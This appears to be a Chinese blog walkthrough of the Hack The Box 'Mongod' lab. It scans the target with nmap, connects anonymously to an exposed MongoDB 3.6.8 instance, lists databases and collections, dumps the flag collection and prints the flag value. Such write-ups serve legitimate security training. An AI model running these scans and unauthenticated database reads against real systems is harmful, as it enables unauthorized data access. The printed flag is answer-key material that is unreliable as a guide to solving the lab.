0
点赞
收藏
分享

微信扫一扫

Hack The Box(黑客盒子)Mongod-mongoDB工具篇

题目


情报

数据库可能存在未知缺陷,可能存在匿名访问漏洞。


实战

TASK1

nmap -Pn -p- -sT -T4 --min-rate=1000 10.129.167.185

参数解释:

2

TASK2

nmap -sV -p27017 10.129.167.185

MongoDB 3.6.8

TASK3

nosql

TASK4

kali没有自带这个工具,ParrotOS应该自带了。先安装。

apt install mongodb-clients

mongo

TASK5

先给出该工具的使用方法和参数。

        我们是连接远程数据库,还不知道用户名和密码,但是根据官方题目所披露的靶机缺陷,存在匿名访问漏洞,所以尝试直接连接。

mongo 10.129.167.185:27017

   成功连接到远程数据库。

连接上后列出服务器上所有的数据库。

show dbs

show dbs

TASK6

我们使用一个数据库,然后列出库中的所有集合。

use admin

列出该库中所有的集合。

show collections

show collections

TASK7

翻译:用于以易于阅读的格式存储名为 flag 的集合中的所有文档内容的命令是什么?

db.flag.find().pretty()

这里附上mongon工具的使用。

        但是呢因为我对这个工具不是很熟,所以我还是使用navicat工具来查看flag吧。打开navicat16,连接数据库。这里不需要选择验证,因为存在匿名访问。

找到了。

1b6e6fb359e7c40241b6d431427ba6ea

通关。

举报

相关推荐

0 条评论